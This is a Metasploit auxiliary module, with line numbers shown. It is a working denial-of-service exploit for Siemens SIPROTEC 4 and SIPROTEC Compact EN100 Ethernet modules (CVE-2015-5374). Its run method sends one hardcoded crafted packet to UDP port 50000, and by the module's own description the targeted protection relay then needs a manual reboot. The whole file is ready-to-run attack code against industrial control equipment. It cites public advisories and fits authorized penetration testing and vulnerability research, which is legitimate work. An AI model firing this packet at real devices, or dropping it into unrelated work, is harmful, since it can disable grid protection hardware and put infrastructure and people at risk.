1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(_info = {})
11
    super(
12
      'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
13
      'Description' => %q{
14
         This module sends a specially crafted packet to port 50000/UDP
15
         causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
16
         A manual reboot is required to return the device to service.
17
         CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
18
      },
19
      'Author' => [ 'M. Can Kurnaz' ],
20
      'License' => MSF_LICENSE,
21
      'References' => [
22
        [ 'CVE', '2015-5374' ],
23
        [ 'EDB', '44103' ],
24
        [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]
25
      ],
26
      'Notes' => {
27
        'Stability' => [CRASH_SERVICE_DOWN],
28
        'SideEffects' => [],
29
        'Reliability' => []
30
      }
31
    )
32

33
    register_options([Opt::RPORT(50000),])
34
  end
35

36
  def run
37
    connect_udp
38
    pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
39
    print_status('Sending DoS packet...')
40
    udp_sock.put(pckt)
41
    disconnect_udp
42
  end
43
end
44

45